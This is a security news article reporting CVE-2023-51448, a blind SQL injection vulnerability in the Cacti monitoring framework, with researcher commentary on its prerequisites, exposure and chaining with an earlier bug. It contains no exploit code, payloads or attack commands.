Source: Nate Hovee via Shutterstock
A critical vulnerability in the Cacti Web-based open source framework for monitoring network performance gives attackers a way to disclose Cacti's entire database contents — presenting a prickly risk for organizations.
Thousands of websites use Cacti to collect network performance information such as that related to bandwidth utilization, CPU and memory usage, and disk I/O — from devices such as routers, switches, and servers. Organizations use the collected data to populate the Round Robin Database utility (RRDTool) so they can create graphic and visual metrics from it.
As such, it has reach into the entire IT footprint within an organization — offering invaluable reconnaissance opportunities for cyberattackers, as well as a pivot point to go deeper into the network.
Importantly, an attacker could also chain CVE-2023-51448 with another, previously disclosed Cacti vulnerability — CVE-2023-49084 —to achieve remote code execution (RCE) on vulnerable systems.
CVE-2023-51448 in Cacti: Insufficient Sanitization
The vulnerability, tracked as CVE-2023-51448, is present in Cacti version 1.2.25. Cacti has released an updated version of the software that addresses the bug.
The issue has to do with the app not properly sanitizing input data, thereby leaving the path open for what is known as a blind SQL injection attack. GitHub has assigned the vulnerability a severity rating of 8.8 out of a maximum possible 10 on the CVSS 3.1 scale and described it as an issue that requires an attacker to only have low privileges to exploit.
Matthew Hogg, a security researcher from Synopsys who
discovered the vulnerability and reported it to the maintainers of Cacti last month, says an attacker would need an authenticated account with the "Settling/Utilities" privilege to exploit the flaw.
"Finding systems running Cacti is trivial, as a malicious actor can use a service like Shodan to query for live systems," Hogg says. "A malicious actor, using [Shodan], could automate their initial reconnaissance to find systems running vulnerable versions to focus their activities."
As of Monday morning, a Shodan search listed more than 4,000 Cacti hosts that are potentially running vulnerable versions of Cacti, he says.
According to Hogg, to trigger CVE-2023-51448, an authenticated attacker with Settings/Utilities privileges would need to send a specially crafted HTTP GET request with an SQL injection payload to the endpoint '/managers.php'.
"Using a blind SQL technique, an attacker can disclose Cacti database contents or trigger remote code execution (RCE)," Hogg says.
Blind SQL Means Mass Attacks Unlikely, Still a Thorny Issue
In a blind SQL injection attack, the attackers do not see the direct result of an injected SQL query. Instead, they need to try and infer it based on how the application might respond.
"Blind is often used to describe SQL injection in which the results are not directly returned to the attacker but are inferred out-of-band using an oracle," Hogg says referring to external sources of information such as error messages and timing delays. "In this case a time-based oracle can be used to check if some Boolean condition is met. The differential between response times is used to evaluate if the condition was met, which could, for example, be checking the value of a character the attacker wants to leak."
Blind SQL injection attacks are hard to pull off on a mass scale. However, an attacker with access to an account with the required privileges can exploit the vulnerability in Cacti with ease, Hogg notes. "Blind SQL Injections are easy to execute, but difficult to exploit due to the nature of the attack vector."
However, referring to the potential for chaining the vulnerability with the aforementioned bug, the security researcher says: "A competent attacker who satisfies the prerequisites for CVE-2023-49084 would be able to execute CVE-2023-51448 in a trivial manner."
The latest vulnerability is one of the several that researchers have reported in Cacti over the past year. One of the more serious among them is CVE-2022-46169, an unauthenticated command injection vulnerability disclosed last January for which exploit become publicly available a few months later. Another is CVE-2023-39362, a vulnerability disclosed in June for which exploits become publicly available in October.